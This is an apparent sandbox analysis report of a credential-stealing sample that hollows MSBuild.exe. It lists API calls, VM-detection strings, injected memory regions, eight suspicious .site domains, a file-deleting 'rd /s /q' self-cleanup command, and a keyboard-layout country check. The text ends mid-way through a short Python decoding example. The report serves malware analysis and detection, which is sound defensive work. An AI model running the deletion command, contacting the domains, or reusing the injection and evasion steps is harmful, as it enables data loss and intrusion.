Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD37
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003173FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_003173FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410FBA GetSystemInfo,wsprintfA, 1_2_00410FBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8e
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\ProgramData\GCGHCBKFCF.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B20AD VirtualProtect,LdrInitializeThunk,GetConsoleWindow,CallWindowProcW, 0_2_005B20AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005BB5D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005BB5D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418A63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B208F mov edi, dword ptr fs:[00000030h] 0_2_005B208F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D937A mov eax, dword ptr fs:[00000030h] 0_2_005D937A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D9362 mov eax, dword ptr fs:[00000030h] 0_2_005D9362
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D9385 mov eax, dword ptr fs:[00000030h] 0_2_005D9385
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F0582 mov eax, dword ptr fs:[00000030h] 0_2_005F0582
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005C7ED8 mov eax, dword ptr fs:[00000030h] 0_2_005C7ED8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005BEE8C mov ecx, dword ptr fs:[00000030h] 0_2_005BEE8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014AD mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040148A mov eax, dword ptr fs:[00000030h] 1_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014A2 mov eax, dword ptr fs:[00000030h] 1_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004186A9 mov eax, dword ptr fs:[00000030h] 1_2_004186A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004186AA mov eax, dword ptr fs:[00000030h] 1_2_004186AA
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0030208F mov edi, dword ptr fs:[00000030h] 8_2_0030208F
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0030EE8C mov ecx, dword ptr fs:[00000030h] 8_2_0030EE8C
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00317ED8 mov eax, dword ptr fs:[00000030h] 8_2_00317ED8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005CA4D7 GetProcessHeap, 0_2_005CA4D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B7490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_005B7490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005BB5D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005BB5D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B77B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005B77B5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B7942 SetUnhandledExceptionFilter, 0_2_005B7942
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042774E SetUnhandledExceptionFilter, 1_2_0042774E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6CADB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CADB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CC8AC62
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00307490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00307490
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0030B5D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0030B5D6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003077B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_003077B5
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00307942 SetUnhandledExceptionFilter, 8_2_00307942

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\GCGHCBKFCF.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 1_2_0040F54A
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: GCGHCBKFCF.exe String found in binary or memory: soldiefieop.site
Source: GCGHCBKFCF.exe String found in binary or memory: questionsmw.stor
Source: GCGHCBKFCF.exe String found in binary or memory: absorptioniw.site
Source: GCGHCBKFCF.exe String found in binary or memory: mysterisop.site
Source: GCGHCBKFCF.exe String found in binary or memory: snarlypagowo.site
Source: GCGHCBKFCF.exe String found in binary or memory: treatynreit.site
Source: GCGHCBKFCF.exe String found in binary or memory: chorusarorp.site
Source: GCGHCBKFCF.exe String found in binary or memory: abnomalrkmu.site
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_0041257F
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E1B008
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000
Source: C:\ProgramData\GCGHCBKFCF.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 71E008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\GCGHCBKFCF.exe "C:\ProgramData\GCGHCBKFCF.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKFIJDHJEGI" & exit
Source: C:\ProgramData\GCGHCBKFCF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D9076 cpuid 0_2_005D9076
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_005CA0A0
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_005CA1A6
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_005CA275
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_005FF56E
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C1A32
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C9BFE
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C9BB3
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_005C9C99
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_005C9D24
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_005C1EDC
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_005C9F77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 1_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 1_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 1_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 1_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesA, 1_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 1_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 1_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 1_2_0042E7C4
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_0031A0A0
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW, 8_2_0031A1A6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_0031A275
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00311A32
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00319BB3
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00319BFE
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: EnumSystemLocalesW, 8_2_00319C99
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_00319D24
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW, 8_2_00311EDC
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: GetLocaleInfoW, 8_2_00319F77
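The function at 1_2_00410DDB in the hollowed MSBuild.exe calls GetKeyboardLayoutList twice (once for the count, once to fill a LocalAlloc'd buffer) and then GetLocaleInfoA per layout; the "Country aware sample found (crashes after keyboard check)" signature in the overview refers to this routine. The check works on the low word of each HKL, which is the layout's LANGID, and the low 10 bits of a LANGID are the primary language. The following is an added example, not code recovered from the sample, that reproduces the decode step so an analyst can see which installed layouts would trip such a check. The report does not state which languages this build excludes; the exclusion set below is an assumption used only to demonstrate the mechanism, and the live user32 call is optional and Windows-only.

```python
"""Decode keyboard-layout handles the way a GetKeyboardLayoutList country check does."""
import sys
from typing import Iterable, List, Set

# Win32 LANGID layout: low 10 bits primary language, high 6 bits sub-language.
# The low word of an HKL returned by GetKeyboardLayoutList is the layout's LANGID.
LANG_RUSSIAN, LANG_UKRAINIAN, LANG_BELARUSIAN, LANG_KAZAKH = 0x19, 0x22, 0x23, 0x3F

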